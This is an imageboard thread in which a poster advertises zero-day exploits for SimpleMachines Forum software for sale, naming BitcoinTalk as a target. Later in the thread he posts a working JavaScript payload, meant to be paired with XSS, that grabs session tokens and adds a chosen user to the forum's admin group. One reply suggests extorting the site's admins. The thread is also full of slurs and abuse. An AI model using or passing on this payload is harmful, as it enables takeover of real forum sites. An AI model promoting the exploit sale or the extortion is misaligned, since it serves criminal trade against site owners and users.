Selling 0day exploit for popular forum software

So, I have a private exploit (well, several viable exploits) for SimpleMachines forums. All versions are affected. I'm willing to sell a maximum of 10 copies (to prevent it from getting over-saturated and leaked)

BitcoinTalk and some other relatively huge sites run this software (google to find some large examples)

I'll provide proof the exploits exist to any potentially serious buyer who can provide proof of funds. BTC or Amazon Gift Card only -- I'm selling this at $500 per copy since I plan to sell 10 copies in total (otherwise I'd want around $5k for this)

The exploits in question allow for authentication bypass, automated admin takeover, XSS, SSRF (Leading to pre-auth RCE), Post-Auth RCE, and a few other bugs.

If anyone is interested or has questions, let me know. If this thread dies you can contact me via email at [email protected]

Generally I'd sell this to Zerodium or ZDI, but these exploit brokers are currently not looking to purchase exploits affecting SMF.

Pic unrelated.

Attached: aow.png (1662x2560, 785K)

Other urls found in this thread:

forum.snahp.it/
twitter.com/NSFWRedditImage

Reddit spacer and tech illiterate probably cannot even code one line of C
go back

Also, I should mention that if you're not willing to go first, I'm happ to use a trusted middle-man or an escrow service

can you fucking stop advertising on Jow Forums?

Not a redditor. I'm a bit rusty when it comes to *chan boards as I haven't used any in over a decade


#include
#include

int postID = '71446388'
int no_homo;
int main (void) {

if (no_homo != postID) {

printf("Looks like %d is a raging homosexual\n",postID);
}
else {
printf("nope still looks like a homo to me\n");
}
return(0);
}


>>trollface.jpg


anyway, if there's any serious buyers here, hmu and i'll provide proof of 0day.
}

Personally id rather g have some useful interesting adverts than another 500 itoddler btfo!!! Animeposting retardation threads

Figured Jow Forums is a good place to sell 0day but I guess you guys have turned out to be even bigger crybabies than redditfags

a skiddie unable to use [ code][/code] tags on Jow Forums
cute! now go scam somewhere else, your thread ain't tech

Can you stfu this is not the desktop thread
>

test it on forum.snahp.it/ or gtfo

>waaaaaaaaa why would you buy my useless shit
> we're the crybabies

back when I used chan boards there was no such thing as tags. This is indeed tech -- I'm willing to discuss the content of the exploits and how they work (just not revealing vuln endpoints or anything of the sort) - regarding your "scam" comment, as previously stated, I'm willing to use a trusted middleman or an escrow service

>forum.snahp.it/

How do I know this isn't your website? For all I know you could just be the admin and could grep the access_log from your httpd in order to get my exploits for free.

lmaooo so i think this comment demonstrates exactly how long its been since ive used Jow Forums


Go show me some of your own exploits before calling my shit uselses. I can happily provide scores of exploit CVE's I've published, and news reports accompanying my exploit releases... can you do the same?

Btw, I intend to start using Jow Forums on a regular basis (not just for advertisements)

if anyone is into webapp security, exploit development, and/or bug bounty hunting then hit me up.. maybe we can work on some cool stuff together :)

i can show you muh dick

>sell a maximum of 10 copies (to prevent it from getting over-saturated and leaked)
Lmao, fucking retarded.

how do i know you didn't get your site raped with ""your"" exploit by someone else????

user posts interesting technology thread on technology board, gets told to stop advertising by someone who'd rather argue about android vs iphone

TECHNOLOGY

okay samefag, until OP doesn't record a webm of the thing in use I call BS and a scam
he obviously just wants to advertise here to make money on an "exploit" that likely doesn't even exist.

I'm not asking for source code, but until he shows it being used on a live server this is some grade A+ plus ponzi scheme

Nothing about this thread is tech until OP delivers that demo recording.

I guess you haven't had much experience selling 0day -- even the likes of giant exploit brokers such as Zerodium and TrendMicro's ZDI sell limited numbers of multiple copies to different buyers.

Well, you're just going to have to take my word for this. I can always show you some of my other (public) exploits that I've developed.

yeah I don't get it, this isn't *solely* an advertisement... I'm more than willing to discuss specifics and semantics here, or even just generic stuff like the process for auditing webapps to find 0days in general

I'll quite happily post one of the lower impact exploits here (which can be used standalone to gain access if you have user interaction with an admin) but im not sharing a webm of me exploiting the SSRF because that would LITERALLY be giving you a step-by-step guide on how to get pre-auth RCE.

I'll post the proof of concept for the admin auth bypass if you wish though.

You're literally posting about your 0days on a public website, how dumb can you be?
But sure, show some of your other "exploits".

Provide at least some sort of PoC.

POST BOBS AND VAGENE

I guess the super hacker ran away, time to sleep.

>25 posts
>9 ip's
Sad!

Honestly this isnt the place (anymore). Too much moral faggotry, sheltered underage kids, and corporate shills who get scared at any and all mention of anything illegal. Also this board is tech illiterate, so any such technical exploit would be lost/wasted on them.

find satoshi's IP from bitcointalk if ur so cool

>”i’m An e1337 h4x0r with over 5,000 confirmed kills”
>using Jow Forums to advertise
>thinking anyone here has any money
>crying bc no one takes him seriously
Imagine my shock.

>crying bc no one takes him seriously
No one takes chan seriously anymore (if pol shut down this site would probably die within a week)

>if Jow Forums shut down
god I can dream, less retards in my tech threads and no more paranoia

What tech threads? There may be 1 actual tech thread on Jow Forums at the moment, everything else is just amdrone/incelinside/shill circle jerk

Agreed, only jannies and retards like take it seriously. If Jow Forums was gone then we’d probably see right wing death squads or some shit spark up alongside Jow Forumsommandos itching for action.

The programming thread? I actually see a lot of tech threads, just filter all threads with a female as OP image, a nujak/woja or a pepe. Ignore consumerist threads, desktop threads, dumbphone threads and headphone threads.
Still leaves you with at least 30 topics that are worth to talk about.
Your fault if you let the noise distract you, so you miss the information.

get the god damn fuck off this board

key word, posting ABOUT my 0days, not posting my 0days. Astronomical difference here... how the fuck else do you think 0days get sold? You think buyers from ZDI aren't members of the public?

(pair this with XSS)
function smfInjectAdmin(url, userid) {
var session_key = document.body.innerHTML.match(/sSessionVar: '([a-f0-9]{10})'/)[1];
var session_value = document.body.innerHTML.match(/sSessionId: '([a-f0-9]{32})'/)[1];
var dongs = new XMLHttpRequest();

dongs.open("POST", url +'/index.php?action=moderate;area=viewgroups;sa=members;group=1');
dongs.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
dongs.send(
'member_add[]='+ userid +
'&add=Add+Members'+
'&'+ session_key +'='+ session_value +
'&toAdd='
);
}


>imagine thinking shit-tier troll posts such as this even warrant any kind of noteworthy response

>Imagine being such nu-Jow Forums taking everything for granted.
For wanting PoC, details or a presentation of the code being used?

Thanks, finally we're getting to an interesting and fun thread.

>imagine covering up being this retarded by being this pedantic
Op isn't going to post the thing he's trying to sell you fucking mong

>Op isn't going to post the thing he's trying to sell you fucking mong

He can still record it being used without disclosing the code.

How fucking stupid are you? Ever been to DEFCON? Then bugger off, neo gent ribbitor.

If this really worked on btctalk it's worth a lot more than $500. Extort the admins there instead of selling it here.

Thanks for namefagging so I can filter you. Enjoy your ban.

Attached: image.jpg (1024x678, 157K)

Oh wow you are a bluehat faggot that sucks dick and is retarded enough to post on a glowing honeypot. Good going, jackass.

I'm having a hard time seeing who else but power tripping spergs would care for something like this.

>ever been to this specific event that is my personal benchmark for whether or not ur A rEaL HaCKeR?

kill yourself

Sure, you first :^)